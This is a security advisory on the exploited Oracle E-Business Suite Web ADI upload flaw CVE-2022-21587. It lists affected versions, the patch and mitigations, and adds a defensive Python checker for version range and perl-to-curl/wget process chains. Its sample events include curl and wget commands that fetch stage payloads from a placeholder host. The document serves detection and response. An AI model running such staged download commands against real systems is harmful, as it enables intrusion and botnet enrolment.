Indiscriminate, opportunistic targeting.
Severity Level – Critical (CVSS v3 score of 9.8): Compromise may result in the loss of confidentiality and integrity of data.
Several compromises have been detected that exploit a vulnerability in Oracle E-Business Suite (EBS). The vulnerability, tracked as CVE-2022-21587, is an unauthenticated arbitrary file upload in the Oracle Web Applications Desktop Integrator (Web ADI) Upload component.
Oracle E-Business Suite is a packaged collection of enterprise applications utilised for a range of tasks such as customer relationship management (CRM), enterprise resource planning (ERP) and human capital management (HCM).
Successful exploitation gives an unauthenticated attacker with network access via HTTP control of Oracle Web Applications Desktop Integrator (CVE-2022-21587, CVE-2022-39428) and can lead to unauthenticated remote code execution on the EBS application tier.
Threat actors have been observed using a proof-of-concept exploit in the wild. The observed chain uploads a Perl script, which fetches (via curl or wget) additional script components that in turn download a malicious binary payload, enrolling the victim host in a botnet.
Oracle has released a security patch for the affected product versions; unpatched installations of the versions listed below remain exploitable.
- Oracle Web Applications Desktop Integrator versions: 12.2.3 – 12.2.11
Containment, Mitigations & Remediations
Given the impact of a successful attack, Oracle strongly recommends that customers apply the relevant security patch as soon as possible. Customers should also monitor Oracle’s advisory for further details. Because exploitation was observed before patching, hosts that were internet-exposed while unpatched should be reviewed for the post-exploitation activity described above (uploaded Perl scripts and outbound curl/wget fetches from the application tier), not only patched. The patched version is as follows:
- Oracle Web Applications Desktop Integrator version: 12.2.12
Indicators of Compromise
No specific Indicators of Compromise (IoC) are available at this time.
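Absent published IoCs, two checks a responder can run from the facts in this advisory, written here as an added example rather than code taken from the advisory or from Oracle: a numeric version comparison against the affected Web ADI range (a plain string comparison places "12.2.11" before "12.2.3" and would miss affected hosts), and a triage over process-creation events for the described post-exploitation chain, a perl process spawning curl or wget to fetch a remote URL. The application-tier OS account name `applmgr`, the `ProcEvent` record layout and the sample events are assumptions constructed for this example.

```python
"""Triage helpers for the Web ADI advisory (added example, not vendor code).

1. is_affected(): is a Web ADI version string inside the affected range
   12.2.3 - 12.2.11?  Versions are compared as integer tuples, because a
   string comparison sorts "12.2.11" before "12.2.3".
2. suspicious_fetch_chains(): over process-creation events, flag a perl
   process that spawns curl/wget with a remote URL, the post-exploitation
   pattern described in the advisory.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

AFFECTED_MIN = (12, 2, 3)
AFFECTED_MAX = (12, 2, 11)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '12.2.11' into (12, 2, 11); reject anything non-numeric."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True if the major.minor.patch triple falls in the affected range."""
    v = parse_version(version)
    if len(v) < 3:                      # pad '12.2' to '12.2.0'
        v = v + (0,) * (3 - len(v))
    return AFFECTED_MIN <= v[:3] <= AFFECTED_MAX


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed layout, e.g. from auditd/EDR)."""
    pid: int
    ppid: int
    user: str
    image: str      # executable basename
    cmdline: str


FETCH_TOOLS = {"curl", "wget"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def suspicious_fetch_chains(events: Iterable[ProcEvent],
                            app_users: Tuple[str, ...] = ("applmgr",)
                            ) -> List[Tuple[ProcEvent, ProcEvent, str]]:
    """Return (perl_parent, fetch_child, url) for every curl/wget whose parent
    is a perl process owned by an application-tier account.  Pass app_users=()
    to drop the account filter.  'applmgr' is an assumed EBS app-tier user."""
    events = list(events)
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image not in FETCH_TOOLS:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image != "perl":
            continue
        if app_users and parent.user not in app_users:
            continue
        m = URL_RE.search(e.cmdline)
        if m:
            hits.append((parent, e, m.group(0)))
    return hits


# Constructed sample events; 198.51.100.0/24 is documentation address space.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "applmgr", "java", "java ... oacore ..."),
    ProcEvent(200, 100, "applmgr", "perl", "perl /tmp/.x/upd.pl"),
    ProcEvent(201, 200, "applmgr", "curl",
              "curl -fsSL http://198.51.100.7/s/stage2.sh -o /tmp/.x/s2"),
    ProcEvent(300, 1,   "root",    "perl", "perl /usr/local/bin/report.pl"),
    ProcEvent(301, 300, "root",    "wget",
              "wget -q http://198.51.100.7/bin -O /tmp/bin"),   # root parent: filtered
    ProcEvent(400, 100, "applmgr", "curl",
              "curl http://ebs.internal/health"),                # no perl parent
]

if __name__ == "__main__":
    for ver in ("12.2.2", "12.2.3", "12.2.11", "12.2.12"):
        print(f"Web ADI {ver}: {'AFFECTED' if is_affected(ver) else 'not affected'}")
    for parent, child, url in suspicious_fetch_chains(SAMPLE_EVENTS):
        print(f"perl pid {parent.pid} ({parent.user}) -> {child.image} pid {child.pid}: {url}")
```

Run it as-is to see the version verdicts and the single flagged chain; feed real process telemetry by constructing `ProcEvent` records from your EDR or auditd export, and widen `app_users` to whatever accounts run the EBS application tier in your environment.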
In terms of market share, Oracle E-Business Suite is in the top tier of enterprise application providers. Threat actors generally weigh the probability of successful exploitation against the value of the assets reachable, and on both counts Oracle products are a prime target. Because enterprise application suites hold core business data, threat actors will continue to exploit vulnerabilities in these products in an attempt to exfiltrate the sensitive data they contain.
No attribution to specific threat actors/groups has been identified at the time of this writing.
Lateral Movement:
T1210 – Exploitation of Remote Services
Command and Control:
T1105 – Ingress Tool Transfer